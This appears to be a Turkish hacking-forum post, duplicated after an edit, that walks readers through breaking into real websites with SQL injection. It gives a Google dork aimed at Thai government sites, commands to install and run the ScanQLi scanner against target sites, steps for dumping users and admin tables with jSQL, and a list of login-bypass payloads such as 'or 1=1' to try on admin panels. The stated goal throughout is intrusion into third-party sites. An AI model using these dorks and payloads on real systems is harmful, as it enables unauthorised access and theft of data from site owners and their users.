Merhaba kısa bir konu olacak. Temel SQL Enjeksiyonu ile nasıl siteleri hackleriz anlatacağım.
KONU İÇERİKLERİ;
1) Savunmasız Siteler Nasıl Bulunur?
2) SQL Açığı Bulmak
3) SQL Açığı Sömürmek
4) SQL Bypass Login Yöntemi
.
Savunmasız Siteler Nasıl Bulunuyor?
Savunmasız siteler dork dediğimiz terimler sayesinde bulunabiliyor. Özel dorklar oluşturarak alış veriş siteleri, üniversiteler, oteller şeklinde karşımıza çıkan sitelerde sql antremanları yapabiliriz. Dorklar sayesinde SQL açıklı ve istediğiniz site türüne göre sadece sql de değil zaafiyetler barındıran siteler bulabilirsiniz. Her zaman hepsi hacklenebilir değildir.
Örneğin tayland gov sitelerinin bulunduğu dork;
Şeklinde. Google da arama kısmına bu dorku yazıp çıkan sitelerde az sonra anlattıklarımı deneyebilirsiniz.
2) SQL Açığı Bulmak
Bir sitede SQL açığı var mı nasıl bakarız buna değineceğim. Windows da safe3, Linux sistemlerde ScanQli bulunuyor. Dorklardan bulduğunuz web sitelerin ana örneğin http://www.deneme.com gibi olan kısmını alıp bu araçlarda taratabilirsiniz. Windows kullanmadığım için ScanQli yi anlatacağım. Önce aracı github dan yüklemeliyiz.
( eğer ingilizce kullanıyorsanız cd Desktop )
Kodumuzu terminalde çalıştırıyoruz.
Masaüstüne dosyamız geldi. Gerekli modüllerin kurulumu için;
Komutlarını çalıştırıyoruz. Clear çekerek ekranı temizleyebilirsiniz. Sql taraması yapmak için
Komutunu çalıştırınca site içinde SQL Enjeksiyonu bulunan kısımları url halinde çıkarıyor.
SQL Açığını Sömürmek
Bir çok araç var. Ben windows da Havij . Linux de Jsql tercih ediyorum. Linux de olduğum için Jsql i anlatacağım. Linuxun kendi deposunda bulunuyor.
Komutu ile gerekli kurulum sağlandıktan sonra.
Komutu ile açılabilir.
Gui bir araç arayüz halinde kullanışlı. Terminalin kapatılması durumunda bu ekran da kapanır. Arama yerinden de açılabilir ama bazen donabiliyor.
ScanQli ile bulunan url'leri " Adres Giriniz " kısmına yapıştırıp enter diyerek tek tek denenebilir. Veriler çekildiğinde Veritabanı kısmına gelcektir. Bu veri tabanı kısımlarında mysql,users,login,admin gibi önemli görünebileceklere tıklayarak açabilirsiniz. Daha sonra columslar çıkacaktır. Aynı şekilde önemli gördüklerinizim yanındaki kutuları seçeceksiniz. Sonrasında önceden çıkan o columsa sağ tıklayıp en üst deki yük seçeneğine basacaksınız gerekli bilgiler sağda tablo olarak çıkacaktır.
NOT: Enjeksiyon bulmazsa ya gerçekten enjeksiyon yok veya çekilecek veri bulamamıştır yada aşımlası gereken güvenlik duvarları olabilir. Konularda anlatırım.
SQL Bypass Login Yöntemi
Bazı sitelerde admin panelinde SQL Bypass login yöntemi ile giriş yapabiliyoruz. Sitenin admin panelini bulduktan sonra bu yöntemi deneyebilirsiniz.
Ne bu kod tarzı şeyler denirse. Bunları bulunan admin panelinde deneyerek giriş denemeleri yapılabilir.
Örneğin hem kullanıcı adı kısmına
admin
Girilerek giriş yapılıyor mu denemeleri yapılabilir. Katkısı olması dileğiyle iyi forumlar.
ADMİN PANELLERİ BULMAK İÇİN ADMİN PANEL DORKLARINA GÖZ ATABİLİRSİNİZ.MUTLAKA BYPASS EDİLEBİLİR BULURSUNUZ.
(EDİT)
KONU İÇERİKLERİ;
1) Savunmasız Siteler Nasıl Bulunur?
2) SQL Açığı Bulmak
3) SQL Açığı Sömürmek
4) SQL Bypass Login Yöntemi
.
Savunmasız Siteler Nasıl Bulunuyor?
Savunmasız siteler dork dediğimiz terimler sayesinde bulunabiliyor. Özel dorklar oluşturarak alış veriş siteleri, üniversiteler, oteller şeklinde karşımıza çıkan sitelerde sql antremanları yapabiliriz. Dorklar sayesinde SQL açıklı ve istediğiniz site türüne göre sadece sql de değil zaafiyetler barındıran siteler bulabilirsiniz. Her zaman hepsi hacklenebilir değildir.
Örneğin tayland gov sitelerinin bulunduğu dork;
Kod:
inurl:"select_news.php?news_id="Şeklinde. Google da arama kısmına bu dorku yazıp çıkan sitelerde az sonra anlattıklarımı deneyebilirsiniz.
2) SQL Açığı Bulmak
Bir sitede SQL açığı var mı nasıl bakarız buna değineceğim. Windows da safe3, Linux sistemlerde ScanQli bulunuyor. Dorklardan bulduğunuz web sitelerin ana örneğin http://www.deneme.com gibi olan kısmını alıp bu araçlarda taratabilirsiniz. Windows kullanmadığım için ScanQli yi anlatacağım. Önce aracı github dan yüklemeliyiz.
Kod:
cd Masaüstü
Kod:
git clone https://github.com/bambish/ScanQLi.gitKodumuzu terminalde çalıştırıyoruz.
Masaüstüne dosyamız geldi. Gerekli modüllerin kurulumu için;
Kod:
cd ScanQLi/
Kod:
pip3 install -r requirements.txtKomutlarını çalıştırıyoruz. Clear çekerek ekranı temizleyebilirsiniz. Sql taraması yapmak için
Kod:
python3 scanqli.py -u "http://www.hedefsite.com" -rKomutunu çalıştırınca site içinde SQL Enjeksiyonu bulunan kısımları url halinde çıkarıyor.
SQL Açığını Sömürmek
Bir çok araç var. Ben windows da Havij . Linux de Jsql tercih ediyorum. Linux de olduğum için Jsql i anlatacağım. Linuxun kendi deposunda bulunuyor.
Kod:
apt-get install jsqlKomutu ile gerekli kurulum sağlandıktan sonra.
Kod:
jsqlKomutu ile açılabilir.
Gui bir araç arayüz halinde kullanışlı. Terminalin kapatılması durumunda bu ekran da kapanır. Arama yerinden de açılabilir ama bazen donabiliyor.
ScanQli ile bulunan url'leri " Adres Giriniz " kısmına yapıştırıp enter diyerek tek tek denenebilir. Veriler çekildiğinde Veritabanı kısmına gelcektir. Bu veri tabanı kısımlarında mysql,users,login,admin gibi önemli görünebileceklere tıklayarak açabilirsiniz. Daha sonra columslar çıkacaktır. Aynı şekilde önemli gördüklerinizim yanındaki kutuları seçeceksiniz. Sonrasında önceden çıkan o columsa sağ tıklayıp en üst deki yük seçeneğine basacaksınız gerekli bilgiler sağda tablo olarak çıkacaktır.
NOT: Enjeksiyon bulmazsa ya gerçekten enjeksiyon yok veya çekilecek veri bulamamıştır yada aşımlası gereken güvenlik duvarları olabilir. Konularda anlatırım.
SQL Bypass Login Yöntemi
Bazı sitelerde admin panelinde SQL Bypass login yöntemi ile giriş yapabiliyoruz. Sitenin admin panelini bulduktan sonra bu yöntemi deneyebilirsiniz.
Kod:
or =
= or
or1=1 (güncel)
or 1=1
or 1=1
or 1=1#
or 1=1/*
admin
admin #
admin/*
admin or 1=1
admin or 1=1′
admin or 1=1#
admin or 1=1/*
adminor 1=1 or =
admin or 1=1
admin or 1=1
admin or 1=1#
admin or 1=1/*Ne bu kod tarzı şeyler denirse. Bunları bulunan admin panelinde deneyerek giriş denemeleri yapılabilir.
Örneğin hem kullanıcı adı kısmına
admin
hemde Passwords kısmına
admin
Girilerek giriş yapılıyor mu denemeleri yapılabilir. Katkısı olması dileğiyle iyi forumlar.
ADMİN PANELLERİ BULMAK İÇİN ADMİN PANEL DORKLARINA GÖZ ATABİLİRSİNİZ.MUTLAKA BYPASS EDİLEBİLİR BULURSUNUZ.
(EDİT)
Son düzenleme:
